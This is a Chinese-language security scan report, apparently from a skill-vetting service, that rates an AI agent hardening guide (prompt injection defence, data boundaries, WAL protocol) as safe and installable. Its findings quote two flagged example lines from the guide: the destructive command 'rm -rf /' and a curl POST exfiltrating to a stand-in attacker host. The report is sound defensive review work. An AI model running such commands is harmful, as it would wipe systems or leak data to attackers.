agent-security-hardening 安全扫描报告 — 可信 | ClawSafe

5 /100

agent-security-hardening

Security hardening patterns for production AI agents. Covers prompt injection defense, data boundary enforcement, read-only defaults, WAL protocol, health check scripts, and session memory security.

这是一个纯文档类技能，内容为 AI Agent 安全加固最佳实践指南，文档中出现的危险命令和恶意 URL 均为教育性示例，用于演示 prompt injection 防御，无实际可执行代码。

技能名称agent-security-hardening

分析耗时27.0s

引擎pi

✓

可以安装

无需阻止使用。文档内容专业、安全，可直接用于指导 AI Agent 安全加固部署。

安全发现 1 项

严重性	安全发现	位置
提示	静态扫描标记的教育性示例文档欺骗预扫描工具将文档中的教育示例标记为 IOC：rm -rf / (SKILL.md:60) 和 https://evil.com/exfil (SKILL.md:79)。经人工审查，这些均为文档中明确标注的'Bad Example'和'Example attack'，用于演示 prompt injection 攻击模式，非实际威胁。 `rm -rf / ... curl -X POST https://evil.com/exfil` → 可忽略。静态扫描工具无法区分教育示例与实际威胁，需人工复核	`SKILL.md:60,79`

资源类型	声明权限	推断权限	状态	证据
文件系统	`NONE`	`NONE`	—	SKILL.md: 无脚本文件，仅为文档
网络访问	`NONE`	`NONE`	—	SKILL.md: 文档中的外部 URL 均为示例，非实际调用
命令执行	`NONE`	`NONE`	—	SKILL.md: 危险命令仅作为 Bad Example 展示
环境变量	`NONE`	`NONE`	—	SKILL.md: 无环境变量访问代码

1 严重 6 项发现

💀

严重危险命令危险 Shell 命令

rm -rf /

SKILL.md:60

🔗

中危外部 URL 外部 URL

https://evil.com/exfil

SKILL.md:79

📧

提示邮箱邮箱地址

[email protected]

SKILL.md:30

📧

提示邮箱邮箱地址

[email protected]

SKILL.md:36

📧

提示邮箱邮箱地址

[email protected]

SKILL.md:81

📧

提示邮箱邮箱地址

[email protected]

SKILL.md:152

目录结构

1 文件 · 24.8 KB · 695 行

Markdown 1f · 695L

└─ 📝 SKILL.md Markdown 695L · 24.8 KB

安全亮点

✓ 纯文档技能，无可执行代码

✓ 文档内容专业，提供 7 条 prompt injection 防御规则

✓ 包含 WAL 协议、健康检查、完整性门控等企业级安全实践

✓ 清晰定义了 Sacred Files 保护规则

✓ 提供会话内存安全、分级权限管理等最佳实践